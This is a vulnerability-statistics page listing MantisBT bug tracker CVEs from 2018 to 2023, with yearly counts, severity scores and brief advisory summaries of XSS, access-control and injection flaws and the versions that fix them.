MantisBT Mantis Bug Tracker (MantisBT)
Products by MantisBT Sorted by Most Security Vulnerabilities since 2018
By the Year
In 2024 there have been 0 vulnerabilities in MantisBT . Last year MantisBT had 3 security vulnerabilities published. Right now, MantisBT is on track to have less security vulnerabilities in 2024 than it did last year.
Year | Vulnerabilities | Average Score |
---|---|---|
2024 | 0 | 0.00 |
2023 | 3 | 4.90 |
2022 | 4 | 6.35 |
2021 | 4 | 6.40 |
2020 | 7 | 5.57 |
2019 | 4 | 7.00 |
2018 | 7 | 5.39 |
It may take a day or so for new MantisBT vulnerabilities to show up in the stats or in the list of recent security vulnerabilties. Additionally vulnerabilities may be tagged under a different product or component name.
Recent MantisBT Security Vulnerabilities
The LinkedCustomFields plugin for MantisBT allows users to link values between two custom fields, creating linked drop-downs
CVE-2023-49802
6.1 - Medium
- December 11, 2023
The LinkedCustomFields plugin for MantisBT allows users to link values between two custom fields, creating linked drop-downs. Prior to version 2.0.1, cross-site scripting in the MantisBT LinkedCustomFields plugin allows Javascript execution, when a crafted Custom Field is linked via the plugin and displayed when reporting a new Issue or editing an existing one. This issue is fixed in version 2.0.1. As a workaround, one may utilize MantisBT's default Content Security Policy, which blocks script execution.
XSS
MantisBT is an open source bug tracker
CVE-2023-44394
4.3 - Medium
- October 16, 2023
MantisBT is an open source bug tracker. Due to insufficient access-level checks on the Wiki redirection page, any user can reveal private Projects' names, by accessing wiki.php with sequentially incremented IDs. This issue has been addressed in commit `65c44883f` which has been included in release `2.258`. Users are advised to upgrade. Users unable to upgrade should disable wiki integration ( `$g_wiki_enable = OFF;`).
Exposure of Resource to Wrong Sphere
Mantis Bug Tracker (MantisBT) is an open source issue tracker
CVE-2023-22476
4.3 - Medium
- February 23, 2023
Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions prior to 2.25.6, due to insufficient access-level checks, any logged-in user allowed to perform Group Actions can access to the _Summary_ field of private Issues (i.e. having Private view status, or belonging to a private Project) via a crafted `bug_arr[]` parameter in *bug_actiongroup_ext.php*. This issue is fixed in version 2.25.6. There are no workarounds.
An XSS vulnerability in MantisBT before 2.25.5 allows remote attackers to attach crafted SVG documents to issue reports or bugnotes
CVE-2022-33910
5.4 - Medium
- June 24, 2022
An XSS vulnerability in MantisBT before 2.25.5 allows remote attackers to attach crafted SVG documents to issue reports or bugnotes. When a user or an admin clicks on the attachment, file_download.php opens the SVG document in a browser tab instead of downloading it as a file, causing the JavaScript code to execute.
XSS
An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2
CVE-2022-28508
6.1 - Medium
- May 04, 2022
An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.
XSS
Lack of Neutralization of Formula Elements in the CSV API of MantisBT before 2.25.3
CVE-2021-43257
7.8 - High
- April 14, 2022
Lack of Neutralization of Formula Elements in the CSV API of MantisBT before 2.25.3 allows an unprivileged attacker to execute code or gain access to information when a user opens the csv_export.php generated CSV file in Excel.
CSV Injection
An XSS issue was discovered in MantisBT before 2.25.3
CVE-2022-26144
6.1 - Medium
- April 13, 2022
An XSS issue was discovered in MantisBT before 2.25.3. Improper escaping of a Plugin name allows execution of arbitrary code (if CSP allows it) in manage_plugin_page.php and manage_plugin_uninstall.php when a crafted plugin is installed.
XSS
An XSS issue was discovered in manage_custom_field_edit_page.php in MantisBT before 2.25.2
CVE-2021-33557
6.1 - Medium
- June 17, 2021
An XSS issue was discovered in manage_custom_field_edit_page.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.
XSS
An issue was discovered in MantisBT before 2.24.5
CVE-2009-20001
8.1 - High
- March 07, 2021
An issue was discovered in MantisBT before 2.24.5. It associates a unique cookie string with each user. This string is not reset upon logout (i.e., the user session is still considered valid and active), allowing an attacker who somehow gained access to a user's cookie to login as them.
Insufficient Session Expiration
An issue was discovered in MantisBT through 2.24.3
CVE-2020-35571
6.1 - Medium
- February 22, 2021
An issue was discovered in MantisBT through 2.24.3. In the helper_ensure_confirmed call in manage_custom_field_update.php, the custom field name is not sanitized. This may be problematic depending on CSP settings.
XSS
An issue was discovered in the Source Integration plugin before 2.4.1 for MantisBT
CVE-2020-36192
5.3 - Medium
- January 18, 2021
An issue was discovered in the Source Integration plugin before 2.4.1 for MantisBT. An attacker can gain access to the Summary field of private Issues (either marked as Private, or part of a private Project), if they are attached to an existing Changeset. The information is visible on the view.php page, as well as on the list.php page (a pop-up on the Affected Issues id hyperlink). Additionally, if the attacker has "Update threshold" in the plugin's configuration (set to the "updater" access level by default), then they can link any Issue to a Changeset by entering the Issue's Id, even if they do not have access to it.
An issue was discovered in MantisBT before 2.24.4
CVE-2020-35849
7.5 - High
- December 30, 2020
An issue was discovered in MantisBT before 2.24.4. An incorrect access check in bug_revision_view_page.php allows an unprivileged attacker to view the Summary field of private issues, as well as bugnotes revisions, gaining access to potentially confidential information via the bugnote_id parameter.
AuthZ
An issue was discovered in MantisBT before 2.24.3
CVE-2020-25288
4.8 - Medium
- September 30, 2020
An issue was discovered in MantisBT before 2.24.3. When editing an Issue in a Project where a Custom Field with a crafted Regular Expression property is used, improper escaping of the corresponding form input's pattern attribute allows HTML injection and, if CSP settings permit, execution of arbitrary JavaScript.
XSS
An issue was discovered in file_download.php in MantisBT before 2.24.3
CVE-2020-25781
4.3 - Medium
- September 30, 2020
An issue was discovered in file_download.php in MantisBT before 2.24.3. Users without access to view private issue notes are able to download the (supposedly private) attachments linked to these notes by accessing the corresponding file download URL directly.
AuthZ
An issue was discovered in MantisBT before 2.24.3
CVE-2020-25830
4.8 - Medium
- September 30, 2020
An issue was discovered in MantisBT before 2.24.3. Improper escaping of a custom field's name allows an attacker to inject HTML and, if CSP settings permit, achieve execution of arbitrary JavaScript when attempting to update said custom field via bug_actiongroup_page.php.
XSS
An XSS issue was discovered in MantisBT before 2.24.2
CVE-2020-16266
5.4 - Medium
- August 12, 2020
An XSS issue was discovered in MantisBT before 2.24.2. Improper escaping on view_all_bug_page.php allows a remote attacker to inject arbitrary HTML into the page by saving it into a text Custom Field, leading to possible code execution in the browser of any user subsequently viewing the issue (if CSP settings allow it).
XSS
The proj_doc_edit_page.php Project Documentation feature in MantisBT before 2.21.3 has a stored cross-site scripting (XSS) vulnerability
CVE-2019-15539
6.1 - Medium
- March 19, 2020
The proj_doc_edit_page.php Project Documentation feature in MantisBT before 2.21.3 has a stored cross-site scripting (XSS) vulnerability, allowing execution of arbitrary code (if CSP settings permit it) after uploading an attachment with a crafted filename. The code is executed when editing the document's page.
XSS
A cross-site scripting (XSS) vulnerability was discovered in the Source Integration plugin before 1.6.2 and 2.x before 2.3.1 for MantisBT
CVE-2020-8981
6.1 - Medium
- February 13, 2020
A cross-site scripting (XSS) vulnerability was discovered in the Source Integration plugin before 1.6.2 and 2.x before 2.3.1 for MantisBT. The repo_delete.php Delete Repository page allows execution of arbitrary code via a repo name (if CSP settings permit it). This is related to CVE-2018-16362.
XSS
MantisBT before 1.3.20 and 2.22.1
CVE-2019-15715
7.2 - High
- October 09, 2019
MantisBT before 1.3.20 and 2.22.1 allows Post Authentication Command Injection, leading to Remote Code Execution.
Shell injection
The Timeline feature in my_view_page.php in MantisBT through 2.21.1 has a stored cross-site scripting (XSS) vulnerability
CVE-2019-15074
9.6 - Critical
- August 21, 2019
The Timeline feature in my_view_page.php in MantisBT through 2.21.1 has a stored cross-site scripting (XSS) vulnerability, allowing execution of arbitrary code (if CSP settings permit it) after uploading an attachment with a crafted filename. The code is executed for any user having visibility to the issue, whenever My View Page is displayed.
XSS